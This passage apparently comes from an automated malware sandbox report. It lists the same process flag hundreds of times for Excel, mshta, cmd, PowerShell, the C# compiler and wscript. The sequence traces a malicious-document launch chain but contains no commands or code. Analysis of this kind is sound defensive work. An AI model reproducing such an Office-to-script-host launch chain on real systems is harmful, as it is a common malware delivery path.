                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
